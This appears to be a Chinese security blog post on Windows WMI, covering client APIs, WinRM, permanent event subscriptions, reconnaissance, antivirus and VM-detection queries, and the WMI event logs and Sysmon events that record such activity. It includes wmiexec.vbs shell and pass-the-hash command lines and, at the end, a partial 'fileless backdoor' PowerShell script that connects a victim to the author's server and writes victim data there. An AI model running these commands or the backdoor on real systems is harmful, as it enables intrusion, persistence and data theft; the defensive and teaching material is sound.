<pre><code class="VB">    strComputer = &quot;.&quot;
    Set objWMIService = GetObject(&quot;winmgmts:{impersonationLevel=impersonate}!\\&quot; &amp; strComputer &amp; &quot;\root\cimv2&quot;)
    Set colItems = objWMIService.ExecQuery(&quot;Select * from Win32_ComputerSystem&quot;)
    For Each objItem in colItems
        Wscript.Echo &quot;Computer Name: &quot; &amp; objItem.Name
    Next

https://docs.microsoft.com/zh-cn/windows/win32/wmisdk/creating-wmi-clients

</code></pre>
<h3 id="7-C-C-调用-IWbem-COM-API"><a href="#7-C-C-调用-IWbem-COM-API" class="headerlink" title="7. C/C++ 调用 IWbem* COM API"></a>7. C/C++ 调用 IWbem* COM API</h3><p>如果你需要使用非托管语言如 C 或 C++ 与 WMI 进行交互,你将需要使用 <a href="https://msdn.microsoft.com/en-us/library/aa389276(v=vs.85" target="_blank" rel="noopener">WMI 的 COM API</a>.aspx)。逆向工程师将需要非常熟悉此接口以及每一个 COM Guid 才能充分理解与 WMI 交互的恶意软件。</p>
<h3 id="8-Net-System-Management-类"><a href="#8-Net-System-Management-类" class="headerlink" title="8. .Net System.Management 类"></a>8. .Net System.Management 类</h3><p>System.Management 命名空间是 .NET 框架中的 WMI 命名空间。此命名空间包括下列支持 WMI 操作的第一级类对象: </p>
<pre><code>ManagementObject 或 ManagementClass: 分别为单个管理对象或类。
ManagementObjectSearcher: 用于根据指定的查询或枚举检索 ManagementObject 或 ManagementClass 对象的集合。
ManagementEventWatcher: 用于预订来自 WMI 的事件通知。
ManagementQuery: 用作所有查询类的基础。
</code></pre><p><strong>C#</strong></p>
<pre><code class="CSharp">using Microsoft.Management.Infrastructure;
...
CimSession session = CimSession.Create(&quot;localHost&quot;);
IEnumerable queryInstance = session.QueryInstances(@&quot;root\cimv2&quot;, &quot;WQL&quot;, &quot;SELECT * FROM Win32_ComputerSystem&quot;);
foreach (CimInstance cimObj in queryInstance)
{
    Console.WriteLine(cimObj.CimInstanceProperties[&quot;Name&quot;].ToString());
}
https://docs.microsoft.com/zh-cn/windows/win32/wmisdk/creating-wmi-clients
</code></pre>
<h3 id="9-winrm-exe-Windows-远程管理-WinRM"><a href="#9-winrm-exe-Windows-远程管理-WinRM" class="headerlink" title="9. winrm.exe - Windows 远程管理 (WinRM)"></a>9. winrm.exe - Windows 远程管理 (WinRM)</h3><p>从分布式组件对象模型 (DCOM) 出现以来它一直是 WMI 所使用的默认协议,通过 TCP 的 135 端口建立初始连接。后续的数据交换则使用随机选定的 TCP 端口。可以通过 dcomcnfg.exe 并最终修改下面的注册表项来配置此端口的范围: </p>
<pre><code>HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Internet -Ports (REG_MULTI_SZ)
</code></pre><p>在 PowerShell 中内置的所有 WMI cmdlets 都是使用 DCOM 进行通信的</p>
<pre><code>ls WSMan:\localhost
</code></pre><p>但是 WinRM 取代了 DCOM 并成为 Windows 推荐的远程管理协议。WinRM 的构建基于 Web 服务管理 (WSMan) 规范 - 一种基于 SOAP 的设备管理协议。</p>
<p>此外,PowerShell 的远程传输协议也是基于 WinRM 规范的, WinRM 也支持 WMI,以及通过网络执行 CIM 操作。</p>
<p>默认情况下,WinRM 服务监听的 TCP 端口是 5985 (HTTP),并且在默认情况下是加密的。还可以配置证书使其支持 HTTPS ,此时监听的 TCP 端口为 5986。</p>
<pre><code>Test-WSMan -ComputerName 10.1.0.100 
PowerShell 提供了一个 cmdlet 可以很方便的验证 WinRM 服务是否正在侦听。如果返回了结果,则表明该系统的 WinRM 服务正处于监听状态。
sc stop winrm , Test-WSMan 就会报错。
</code></pre><p>为了与系统的 WMI 进行交互以便运行 WinRM 服务,唯一支持远程 WMI 交互的内置工具是 winrm.exe 和 PowerShell 的 CIM cmdlet。此外,对于没有运行 WinRM 服务的系统还可以使用 CIM cmdlet 来配置使用 DCOM 。</p>
<p>winrm.exe 可以在运行 WinRM 服务的本地和远程计算机上进行枚举 WMI 对象实例、调用方法,并创建和删除对象实例。也可以用 winrm.exe 来配置 WinRM 设置。</p>
<p>下面的示例显示了 winrm.exe 可用于执行命令、枚举对象的多个实例,并检索单个对象实例:</p>
<pre><code>sc start winrm
winrm invoke Create wmicimv2/Win32_Process @{CommandLine=&quot;notepad.exe&quot;;CurrentDirectory=&quot;C:\&quot;}
winrm enumerate wmicimv2/Win32_Process    ==  winrm enumerate http://schemas.microsoft.com/wbem/wsman/1/wmi/root/cimv2/Win32_Process
winrm get wmicimv2/Win32_OperatingSystem  ==  winrm get http://schemas.microsoft.com/wbem/wsman/1/wmi/root/cimv2/Win32_OperatingSystem
</code></pre><h3 id="10-wmiexec-vbs"><a href="#10-wmiexec-vbs" class="headerlink" title="10. wmiexec.vbs"></a>10. wmiexec.vbs</h3><p>当攻击者使用wmiexec来进行攻击时，Windows系统默认不会在日志中记录这些操作，这意味着可以做到攻击无日志，同时攻击脚本无需写入到磁盘，具有极高的隐蔽性。</p>
<p>越来越多的APT事件中也出现了WMI攻击的影子，利用WMI可以进行信息收集、探测、反病毒、虚拟机检测、命令执行、权限持久化等操作。</p>
<p>最开始我不太喜欢WMI，因为通过WMI执行的命令是没有回显的，这会带来很大的不便。不过在HES2014上有研究者提出了回显的思路，加上psexec类的攻击已被很多的杀软查杀，研究下WMI攻击还是很有必要的。</p>
<p><a href="http://2014.hackitoergosum.org/slides/day1_WMI_Shell_Andrei_Dumitrescu.pdf" target="_blank" rel="noopener">WMI SHELL – new way to get shells on remote Windows machines using only the WMI service</a></p>
<p>常见的WMI攻击工具有这些</p>
<pre><code>PTH-WMIS (最早wmi攻击的工具，单条命令执行，无回显，需要pth-smbget配合读取结果)
impackets 
    wmiexec.py(Linux跨window经常用)
    wmipersist.py
    Wmiquery.py
Empire 
    lateral_movement/invoke_wmi
    persistence/elevated/wmi
wmiexec.vbs (国人制造 为了回显会写文件)
Invoke-WmiCommand&amp;Invoke-PowerShellWmi
</code></pre><p>wmiexec.vbs</p>
<pre><code>1. 半交互模式
    cscript.exe //nologo wmiexec.vbs /shell ip username password
2. 单命令执行
    cscript.exe wmiexec.vbs /cmd ip username password &quot;command&quot;
3. wce_hash注入
    如果抓取的LM hash是AAD3开头的，或者是No Password之类的，就用32个0代替LM hash
    wce -s hash
    cscript.exe //nologo wmiexec.vbs /shell ip
</code></pre><h2 id="0x04-WMI-permanent-event-subscriptions-永久事件订阅"><a href="#0x04-WMI-permanent-event-subscriptions-永久事件订阅" class="headerlink" title="0x04 WMI permanent event subscriptions 永久事件订阅"></a>0x04 WMI permanent event subscriptions 永久事件订阅</h2><p>WMI事件分两类,包括<strong>本地事件</strong>(运行在本地上下文环境当中的单个进程的事件)和<strong>永久性WMI事件订阅(permanent event subscriptions)</strong>。</p>
<p>本地事件有生命周期为进程宿主的周期,而永久性 WMI事件 是存储在WMI库中,以 SYSTEM 权限运行,并且重启后依然存在。</p>
<p>从攻击者或防御者的角度来看, WMI 最强大的功能之一就是对 WMI 事件的异步响应的能力。您可以创建半同步或异步查询来监视对事件日志,进程创建,服务状态,计算机可用性或磁盘驱动器可用空间以及其他实体或事件的更改。</p>
<p>在满足特定条件时,我们可以使用WMI永久事件订阅(permanent event subscriptions)机制来触发特定操作。攻击者经常利用这个功能,在系统启动时执行后门程序,完成本地持久化。</p>
<p>WMI的永久事件订阅(permanent event subscriptions)包含三个核心WMI类: <strong>Filter(过滤器)</strong>类、<strong>Consumer(消费者)</strong>类以及<strong>FilterToConsumerBinding(消费者绑定筛选器)</strong>类。</p>
<h3 id="1-事件筛选器-Event-filter"><a href="#1-事件筛选器-Event-filter" class="headerlink" title="1.事件筛选器(Event filter)"></a>1.事件筛选器(Event filter)</h3><p>筛选出感兴趣的事件(WQL事件查询)</p>
<p>WMI Filter用来定义触发Consumer的具体条件,包括系统启动、特定程序执行、特定时间间隔以及其他条件。</p>
<pre><code>创建一个具有特定名称的进程
将 DLL 加载到进程中
创建具有特定 ID 的事件日志
插入可移动媒体
用户注销
创建、修改、删除任何文件或目录
</code></pre><p>事件筛选器都被存储为一个 <strong>ROOT\subscription:__EventFilter</strong> 对象的实例。</p>
<pre><code>Get-WMIObject -Namespace root\Subscription -Class __EventFilter
</code></pre><p>事件筛选器查询支持以下类型的事件: Intrinsic Events (内部事件) and Extrinsic Events (外部事件)</p>
<h3 id="2-事件消费者-Event-Consumers"><a href="#2-事件消费者-Event-Consumers" class="headerlink" title="2.事件消费者(Event Consumers)"></a>2.事件消费者(Event Consumers)</h3><p>要在事件被触发时执行的操作,包括执行命令、运行脚本、添加日志条目或者发送邮件。</p>
<p>事件消费是一个派生自 <strong>__EventConsumer 系统类</strong>的类,它表示了在事件触发时的动作。可用的标准事件处理类: </p>
<pre><code>LogFileEventConsumer – 将事件数据写入到指定的日志文件
NTEventLogEventConsumer – 创建一个包含事件数据的日志入口点
SMTPEventConsumer – 将事件数据用邮件发送
ActiveScriptEventConsumer – 执行嵌入的 VBScript 或 JScript 脚本 payload
CommandLineEventConsumer – 执行一个命令行程序
</code></pre><p>攻击者在响应他们的事件时,大量使用 ActiveScriptEventConsumer 和 CommandLineEventConsumer 类。这两个事件消费者为攻击者提供了极大的灵活性去执行他们想要执行的任何 payload 并且无需写入一个恶意的可执行文件或脚本到磁盘。</p>
<h3 id="3-消费者绑定筛选器-A-filter-to-consumer-binding"><a href="#3-消费者绑定筛选器-A-filter-to-consumer-binding" class="headerlink" title="3.消费者绑定筛选器(A filter to consumer binding)"></a>3.消费者绑定筛选器(A filter to consumer binding)</h3><p>将筛选器绑定到消费者的注册机制</p>
<p>FilterToConsumerBinding用来将Consumer与Filter关联在一起。创建一个WMI永久事件订阅需要系统的管理员权限。</p>
<p>example APT29 - POSHSPY后门</p>
<pre><code>Mandiant最初在2015年的一次应急响应处置中发现了POSHSPY后门,早期版本的后门使用的是PowerShell脚本。随后,攻击者更新了后门版本,使用WMI来实现本地存储和持久化
APT29使用WMI来完成后门的本地持久化并存储PowerShell后门代码。
    1. 为了存储后门代码,APT29创建了一个新的WMI类,添加了一个文本属性以存储字符串,并将加密base64编码的PowerShell后门存放在该属性中。

    2. 创建了一个WMI事件订阅来运行该后门,其具体内容是通过PowerShell命令,直接从新的WMI属性中读取、加密和执行后门代码。通过这种方法,攻击者可以在系统中安装一个持久性后门,并且不会在系统磁盘上留下任何文件(除了WMI仓库中的文件之外)。这种&quot;无文件&quot;后门技术使得常见的主机分析技术难以识别恶意代码。
</code></pre><h3 id="4-Powershell-实例"><a href="#4-Powershell-实例" class="headerlink" title="4. Powershell 实例"></a>4. Powershell 实例</h3><p>业务场景: 添加WMI事件实现对Winrm service的监控,当Winrm 异常停止时,重新启动。</p>
<p>在Powershell 出生之前, WMI是无可替代的远程(本地)系统管理工具。当下Powershell 已经慢慢取代了ActiveScript+WMI, 然而不可否认WMI依旧是WINDOWS系统管理的利器。</p>
<p><strong>创建EventFilter</strong></p>
<pre><code class="Powershell">$query = &quot;SELECT * FROM __InstanceModificationEvent WITHIN 5 WHERE TargetInstance ISA &#39;Win32_Service&#39; and TargetInstance.Name = &#39;Winrm&#39; and TargetInstance.State = &#39;Stopped&#39;&quot;
$filter = Set-WmiInstance -Class __EventFilter -ComputerName  &quot;localhost&quot; -Namespace &quot;root\subscription&quot; -Arguments `
  @{
    name=&#39;WinrmFilter&#39;; 
    EventNameSpace=&quot;root\cimv2&quot;; 
    QueryLanguage=&quot;WQL&quot;;
    Query=$query
  }

### __InstanceModificationEvent 内部事件(Win32_service的元事件)
###  Get-CimClass -ClassName &quot;__*Event&quot; -PropertyName &#39;TargetInstance&#39;
### WITHIN 5 : 设定触发条件,每隔5s 执行一次

</code></pre>
<p><strong>创建EventConsumer</strong></p>
<pre><code class="Powershell">
$Consumer = Set-WmiInstance -Class CommandLineEventConsumer `
 -ComputerName &quot;localhost&quot; -Namespace &quot;root\subscription&quot; `
 -Arguments @{name=&quot;WinrmDeamon&quot;;
  CommandLineTemplate = { powershell -Command &#39;Winrm quickconfig /q &gt;&gt; C:\Windows\Temp\WinrmEvent.txt;get-date &gt;&gt; C:\Windows\Temp\WinrmEvent.txt&#39; 
   } ;
   ExecutablePath= &#39;C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe&#39;
   }

## or CommandLineTemplate =$exepath;
</code></pre>
<p><strong>消费者绑定筛选器</strong></p>
<pre><code class="Powershell">$Binding = Set-WmiInstance -Class __FilterToConsumerBinding -ComputerName &#39;localhost&#39; `
  -Namespace &quot;root\subscription&quot; -arguments @{Filter=$filter; Consumer=$Consumer} 

</code></pre>
<p>查看WinEvent</p>
<pre><code class="Powershell">Get-WinEvent -ProviderName &#39;Microsoft-Windows-WMI-Activity&#39; -MaxEvents 5 | fl

TimeCreated  : 12/6/2019 1:46:05 AM
ProviderName : Microsoft-Windows-WMI-Activity
Id           : 5861
Message      : Namespace = //./root/subscription; Eventfilter = WinrmFilter (refer to its activate eventid:5859);
               Consumer = CommandLineEventConsumer=&quot;WinrmDeamon&quot;; PossibleCause = Binding EventFilter:
               instance of __EventFilter
               {
                CreatorSID = {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 31, 45, 42, 193, 31, 231, 217, 225, 133, 11, 245,
               58, 233, 3, 0, 0};
                EventNamespace = &quot;root\\cimv2&quot;;
                Name = &quot;WinrmFilter&quot;;
                Query = &quot;SELECT * FROM __InstanceModificationEvent WITHIN 5 WHERE TargetInstance ISA &#39;Win32_Service&#39;
               and TargetInstance.Name = &#39;Winrm&#39; and TargetInstance.State = &#39;Stopped&#39;&quot;;
                QueryLanguage = &quot;WQL&quot;;
               };
               Perm. Consumer:
               instance of CommandLineEventConsumer
               {
                CommandLineTemplate = &quot; powershell &#39;\n        $logPath=\&quot;C:\\WinrmEvent.txt\&quot;\n        Winrm
               quickconfig /q &gt;&gt; logPath\n        get-date &gt;&gt; logPath\n        &#39; \n   &quot;;
                CreatorSID = {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 31, 45, 42, 193, 31, 231, 217, 225, 133, 11, 245,
               58, 233, 3, 0, 0};
                ExecutablePath = &quot;C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe&quot;;
                Name = &quot;WinrmDeamon&quot;;
               };
</code></pre>
<p>or cmd </p>
<pre><code class="csharp">
wmic /NAMESPACE:&quot;\\root\subscription&quot; PATH __EventFilter Create Name=&quot;NotepadFilter&quot;,EventNameSpace=&quot;root\cimv2&quot;,QueryLanguage=&quot;WQL&quot;,Query=&quot;SELECT * FROM __InstanceModificationEvent WITHIN 5 WHERE TargetInstance ISA &#39;Win32_PerfFormattedData_PerfOS_System&#39;&quot;

wmic /NAMESPACE:&quot;\\root\subscription&quot; PATH CommandLineEventConsumer Create Name=&quot;NotepadConsumer&quot;,ExecutablePath=&quot;c:\Windows\System32\notepad.exe&quot;,CommandLineTemplate=&quot;c:\Windows\System32\notepad.exe&quot;

wmic /NAMESPACE:&quot;\\root\subscription&quot; PATH __FilterToConsumerBinding Create Filter=&quot;__EventFilter.Name=\&quot;NotepadFilter\&quot;,Consumer=&quot;CommandLineEventConsumer.Name=\&quot;NotepadConsumer\&quot;&quot;


---&gt; 

wmic /NAMESPACE:&quot;\\root\subscription&quot; PATH __EventFilter GET __RELPATH /FORMAT:list
wmic /NAMESPACE:&quot;\\root\subscription&quot; PATH CommandLineEventConsumer GET __RELPATH /FORMAT:list
wmic /NAMESPACE:&quot;\\root\subscription&quot; PATH __FilterToConsumerBinding GET __RELPATH /FORMAT:list

wmic /NAMESPACE:&quot;\\root\subscription&quot; PATH __FilterToConsumerBinding
-&gt;
    Consumer                                               CreatorSID                                         DeliverSynchronously  DeliveryQoS  Filter                                     MaintainSecurityContext  SlowDownProviders
    NTEventLogEventConsumer.Name=&quot;SCM Event Log Consumer&quot;  {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0}                                         FALSE                              __EventFilter.Name=&quot;SCM Event Log Filter&quot;  FALSE                    FALSE
    CommandLineEventConsumer.Name=&quot;EvilConsumer&quot;           {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 27, 80, 0, 86, 70, 161, 44, 146, 132, 177, 101, 219, 244, 1, 0, 0}  FALSE                              __EventFilter.Name=&quot;EvilFilter&quot;            FALSE                    FALSE
    CommandLineEventConsumer.Name=&quot;NotepadConsumer&quot;        {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 27, 80, 0, 86, 70, 161, 44, 146, 132, 177, 101, 219, 244, 1, 0, 0}  FALSE                              __EventFilter.Name=&quot;NotepadFilter&quot;         FALSE                    FALSE


wmic /NAMESPACE:&quot;\\root\subscription&quot; PATH __eventfilter
-&gt;
    CreatorSID                                                                                                EventAccess  EventNamespace  Name                  Query                                   QueryLanguage
    {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0}                                                                     root\cimv2      SCM Event Log Filter  select * from MSFT_SCMEventLogEvent                                   WQL
    {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 27, 80, 0, 86, 70, 161, 44, 146, 132, 177, 101, 219, 244, 1, 0, 0}               root\cimv2      EvilFilter            SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA &#39;Win32_PerfFormattedData_PerfOS_System&#39;  WQL
    {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 27, 80, 0, 86, 70, 161, 44, 146, 132, 177, 101, 219, 244, 1, 0, 0}               root\cimv2      NotepadFilter         SELECT * FROM __InstanceModificationEvent WITHIN 5 WHERE TargetInstance ISA &#39;Win32_PerfFormattedData_PerfOS_System&#39;   WQL

</code></pre>
<h3 id="5-查看当前WMI-Event及移除"><a href="#5-查看当前WMI-Event及移除" class="headerlink" title="5. 查看当前WMI Event及移除"></a>5. 查看当前WMI Event及移除</h3><pre><code class="Powershell">#List Event Filters
Get-WMIObject -Namespace root\Subscription -Class __EventFilter
Get-WMIObject -Namespace root\subscription -Class __EventFilter -Filter &quot;Name=&#39;WinrmFilter&#39;&quot;
Get-WMIObject -Namespace root\subscription -Class __EventFilter -Filter &quot;Name=&#39;WinrmFilter&#39;&quot; | Remove-WmiObject -Verbose

#List Event Consumers
Get-WMIObject -Namespace root\Subscription -Class __EventConsumer
Get-WMIObject -Namespace root\subscription -Class CommandLineEventConsumer -Filter &quot;Name=&#39;WinrmDeamon&#39;&quot; # 命令行事件消费者
Get-WMIObject -Namespace root\subscription -Class CommandLineEventConsumer -Filter &quot;Name=&#39;WinrmDeamon&#39;&quot; | Remove-WmiObject -Verbose

#List Event Bindings
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding
Get-WMIObject -Namespace root\subscription -Class __FilterToConsumerBinding -Filter &quot;__Path LIKE &#39;%winrm%&#39;&quot;
Get-WMIObject -Namespace root\subscription -Class __FilterToConsumerBinding -Filter &quot;__Path LIKE &#39;%winrm%&#39;&quot; | Remove-WmiObject -Verbose

</code></pre>
<h3 id="6-Intrinsic-Events-内部事件"><a href="#6-Intrinsic-Events-内部事件" class="headerlink" title="6. Intrinsic Events 内部事件"></a>6. Intrinsic Events 内部事件</h3><p>内部事件表示的是创建、修改和删除任何 WMI 类,对象或命名空间的事件。它们也可被用于计时器或 WMI 方法执行的警报。</p>
<p>以下内部事件采用了系统类 (以两个下划线开头) 的形式,并存在于每一个 WMI 命名空间:</p>
<pre><code>__NamespaceOperationEvent
__NamespaceModificationEvent
__NamespaceDeletionEvent
__NamespaceCreationEvent
__ClassOperationEvent
__ClassDeletionEvent
__ClassModificationEvent
__ClassCreationEvent
__InstanceOperationEvent
__InstanceCreationEvent
__MethodInvocationEvent
__InstanceModificationEvent
__InstanceDeletionEvent
__TimerEvent
</code></pre><p>这些事件的作用非常强大,因为它们可以被用于在操作系统中几乎任何可以想见的事件的触发器。</p>
<p>例如,如果触发了一个基于交互式登录的事件则可以形成下面的内部事件查询(由于触发的内部事件有一定的频率,所以必须在 WQL 查询语句的 WITHIN 子句中指定事件轮询间隔。):</p>
<pre><code>SELECT * FROM __InstanceCreationEvent WITHIN 15 WHERE TargetInstance ISA &#39;Win32_LogonSession&#39; AND TargetInstance.LogonType = 2
</code></pre><h3 id="7-Extrinsic-Events-外部事件"><a href="#7-Extrinsic-Events-外部事件" class="headerlink" title="7. Extrinsic Events 外部事件"></a>7. Extrinsic Events 外部事件</h3><p>外部事件解决了和内部事件有关的潜在的轮询问题,因为它们在事件发生时立刻被触发。然而美中不足的是在 WMI 中并没有太多的外部事件,不过,所有已经存在的外部事件的作用很强大,性能也很高。下面的外部事件对于攻击者和防御者来说可能是有用的: </p>
<pre><code>ROOT\CIMV2:Win32_ComputerShutdownEvent
ROOT\CIMV2:Win32_IP4RouteTableEvent
ROOT\CIMV2:Win32_ProcessStartTrace
ROOT\CIMV2:Win32_ModuleLoadTrace
ROOT\CIMV2:Win32_ThreadStartTrace
ROOT\CIMV2:Win32_VolumeChangeEvent
ROOT\CIMV2: Msft_WmiProvider*
ROOT\DEFAULT:RegistryKeyChangeEvent
ROOT\DEFAULT:RegistryValueChangeEvent
</code></pre><p>以下外部事件查询形式可以用来捕获每一个进程已加载的所有可执行模块(用户模式和内核模式)</p>
<pre><code>SELECT * FROM Win32_ModuleLoadTrace
</code></pre><h2 id="0x05-WMI-信息收集及事件触发行为"><a href="#0x05-WMI-信息收集及事件触发行为" class="headerlink" title="0x05 WMI 信息收集及事件触发行为"></a>0x05 WMI 信息收集及事件触发行为</h2><p>在攻击者的各个阶段的攻击生命周期中,WMI 都是极其强大的工具。系统提供了丰富的 WMI 对象、方法和事件,它们的功能极其强大,可以执行很多东西,从系统侦察、反病毒、虚拟机检测、代码执行、横向运动、隐蔽存储数据到持久性。它甚至可以打造一个纯粹的 WMI 后门且无需写入文件到磁盘。</p>
<p>攻击者使用 WMI 有很多优势: </p>
<pre><code>它被默认安装在所有的 Windows 操作系统中,并且可以追溯到 Windows 98 和 NT4.0。
对于执行代码,它可以隐蔽的运行 PSEXEC(VBS脚本调用WMI来模拟psexec)。
WMI 永久事件订阅是作为系统权限运行的。
防御者通常没有意识到 WMI 可以作为一个多用途的攻击向量。
几乎每一个系统操作都能够触发一个 WMI 事件。
除了在 WMI 存储库中存储之外不会对磁盘进行任何操作。
</code></pre><h3 id="1-系统侦察"><a href="#1-系统侦察" class="headerlink" title="1. 系统侦察"></a>1. 系统侦察</h3><p>下面的 WMI 类是在攻击的侦察阶段可以收集数据的子集:</p>
<pre><code>主机/操作系统信息:Win32_OperatingSystem, Win32_ComputerSystem
文件/目录列举: CIM_DataFile
磁盘卷列举: Win32_Volume
注册表操作: StdRegProv
运行进程: Win32_Process
服务列举: Win32_Service
事件日志: Win32_NtLogEvent
登录账户: Win32_LoggedOnUser
共享: Win32_Share
已安装补丁: Win32_QuickFixEngineering
</code></pre><h3 id="2-反病毒-虚拟机检测"><a href="#2-反病毒-虚拟机检测" class="headerlink" title="2. 反病毒/虚拟机检测"></a>2. 反病毒/虚拟机检测</h3><p>已安装的 AV 产品通常会将自己注册在 WMI 中的 AntiVirusProductclass 类中的 root\SecurityCenter 或者是 root\SecurityCenter2 命名空间中,具体是哪一个命名空间则取决于操作系统的版本。</p>
<p>一个 WMI 客户端可以通过执行下面的 WQL 查询示例来获取已安装的 AV 产品:</p>
<pre><code>SELECT * FROM AntiVirusProduct
</code></pre><p>通用的虚拟机/沙盒检测</p>
<p>恶意软件可以使用 WMI 对通用的虚拟机和沙盒环境进行检测。例如,如果物理内存小于 2 GB 或者是单核 CPU ,那么很可能操作系统是在虚拟机中运行的。</p>
<p>WQL 查询示例如下: </p>
<pre><code>SELECT * FROM Win32_ComputerSystem WHERE TotalPhysicalMemory &lt; 2147483648

SELECT * FROM Win32_ComputerSystem WHERE NumberOfLogicalProcessors &lt; 2
</code></pre><h3 id="3-VMware-虚拟机检测"><a href="#3-VMware-虚拟机检测" class="headerlink" title="3. VMware 虚拟机检测"></a>3. VMware 虚拟机检测</h3><p>查找 VMware 字符串是否出现在某些 WMI 对象中并且检查 VMware tools 的守护进程是否正在运行: </p>
<pre><code>SELECT * FROM Win32_NetworkAdapter WHERE Manufacturer LIKE &quot;%VMware%&quot;
SELECT * FROM Win32_BIOS WHERE SerialNumber LIKE &quot;%VMware%&quot;
SELECT * FROM Win32_Process WHERE Name=&quot;vmtoolsd.exe&quot;
SELECT * FROM Win32_NetworkAdapter WHERE Name LIKE &quot;VMware%&quot;

Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList &#39;notepad&#39; -Computer localhost -Credential &#39;corp\admin&#39;
</code></pre><h3 id="4-WMI-事件触发行为"><a href="#4-WMI-事件触发行为" class="headerlink" title="4. WMI 事件触发行为"></a>4. WMI 事件触发行为</h3><p>目前在 WMI 中有极其强大的事件处理子系统,因此, WMI 可以被认为是一个你从来不知道的并且已存在的微软的免费主机 IDS 。</p>
<p>考虑到几乎所有的系统操作都可以触发 WMI 事件,所以,WMI 可以实时的捕捉许多攻击行为。</p>
<p>a. 攻击者使用 WMI 作为持久性机制</p>
<pre><code>影响: __EventFilter 、__EventConsumer 和 __FilterToConsumerBinding 的实例被创建。__InstanceCreationEvent 事件被触发。
    __CLASS - CommandLineEventConsumer ( __SUPERCLASS - __EventConsumer ) 
</code></pre><p>b. WMI Shell 工具集被用于 C2 的通道</p>
<pre><code>影响: __Namespace 对象的实例被创建和修改。因此,__NamespaceCreationEvent 和 __NamespaceModificationEvent 事件被触发了。
</code></pre><p>c. 创建 WMI 类来存储攻击者的数据</p>
<pre><code>影响: __ClassCreationEvent 事件被触发。
</code></pre><p>d. 攻击者安装恶意的 WMI 提供程序</p>
<pre><code>影响: __Provider类的实例被创建,__InstanceCreationEvent事件被触发。
</code></pre><p>e. 攻击者通过 “开始菜单” 和 “注册表” 进行持续攻击</p>
<pre><code>影响: Win32_StartupCommand类实例被创建,__InstanceCreationEvent事件被触发。
</code></pre><p>f. 攻击者通过其他额外的注册表值进行持续攻击</p>
<pre><code>影响: RegistryKeyChangeEvent和RegistryValueChangeEvent事件被触发。
</code></pre><p>g. 攻击者安装服务</p>
<pre><code>影响: Win32_Service 类实例被创建, __InstanceCreationEvent事件被触发。
</code></pre><p>所有的攻击和上述描述的影响都可以用 WMI 事件查询来表示,你可以注册一个事件订阅来检测<strong>InstanceDeletionEvent事件的</strong>EventFilter,<strong>EventConsumer和</strong>FilterToConsumerBinding对象。</p>
<p>Sysmon 可以检测 WmiEventFilter / WmiEventConsumer / WmiEventFilterToConsumer 等。</p>
<p>WMI、 DCOM 和 WinRM 的事件会被记录为下列事件日志：</p>
<pre><code>1. Microsoft-Windows-WinRM/Operational
    显示含有来源 IP 地址的失败的 WinRM 连接尝试

2. Microsoft-Windows-WMI-Activity/Operational
    包含失败的 WMI 查询和可能包含攻击者活动证据的方法调用

3. Microsoft-WindowsDistributedCOM
    显示含有来源 IP 地址的失败的 DCOM 连接尝试
</code></pre><h2 id="0x06-WMI-Backdoor"><a href="#0x06-WMI-Backdoor" class="headerlink" title="0x06 WMI Backdoor"></a>0x06 WMI Backdoor</h2><h3 id="powershell-无文件使用WMI技术执行后门"><a href="#powershell-无文件使用WMI技术执行后门" class="headerlink" title="powershell 无文件使用WMI技术执行后门"></a>powershell 无文件使用WMI技术执行后门</h3><p>特点</p>
<pre><code>不在Client和Server留下任何文件
不改动注册表
仅使用powershell实现
</code></pre><p>环境</p>
<pre><code>Client - Victim : OWA2013 - 10.1.0.213

SERVER : 10.1.0.100
    Username:administrator
    Password:xx
</code></pre><p>脚本</p>
<pre><code class="powershell"># Victim running this ps1 ,  put info to my server
#连接10.1.0.100  , my server
$payload=@&#39;
$Options = New-Object Management.ConnectionOptions
$Options.Username = &#39;administrator&#39;
$Options.Password = &#39;xx&#39;
$Options.EnablePrivileges = $True
$Connection = New-Object Management.ManagementScope
## 连接到远程计算机  or ManagementScope scope = new ManagementScope(&quot;\\\\FullComputerName\\root\\cimv2&quot;, options);scope.Connect();
$Connection.Path = &#39;\\10.1.0.100\root\cimv2&#39;
$Connection.Options = $Options
$Connection.Connect()
$EvilClass = New-Object Management.ManagementClass($Connection, [String]::Empty, $null)
## https://docs.microsoft.com/zh-cn/dotnet/api/system.management.managementclass?view=netframework-4.7.2 
# -&gt; ManagementClass(ManagementScope, ManagementPath, ObjectGetOptions)
# 使用指定选项为指定的 WMI 类初始化 ManagementClass 类的一个新实例
# C# public ManagementClass (System.Management.ManagementScope scope, System.Management.ManagementPath path, System.Management.ObjectGetOptions options);
# https://docs.microsoft.com/zh-cn/dotnet/api/system.management.managementclass.-ctor?view=netframework-4.7.2#System_Management_ManagementClass__ctor_System_Management_ManagementScope_System_Management_ManagementPath_System_Management_ObjectGetOptions_
# 
#新建远程类名 Victim_Info , 存储 Victim info 
$EvilClass[&#39;__CLASS&#39;] = &#39;Victim_Info&#39;
$EvilClass.Properties.Add(&#39;victim_ip_10_1_0_213&#39;, [Management.CimType]::String, $False)
$GetDate = Get-Date # bGet-WmiObject -Namespace ROOT\CIMV2 -Class Win32_ComputerSystem
$EvilClass.Properties[&#39;victim_ip_10_1_0_213&#39;].Value = &quot;Run Command Process : $GetDate&quot;
# Run Command or 获取主机配置信息... : 1. $GetProcess = Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Process 2. $GetProcess
$EvilClass.Put() # ManagementClass - put 提交对象所做的更改
&#39;@
#对payload作base64加密
$bytes = [System.Text.Encoding]::Unicode.GetBytes($payload);
$encodedPayload = [System.Convert]::ToBase64String($bytes);

#新建本地类 Victim_EncodeCommand_Class 存储加密后的payload
$StaticClass = New-Object Management.ManagementClass(&#39;root\cimv2&#39;,$null,$null)
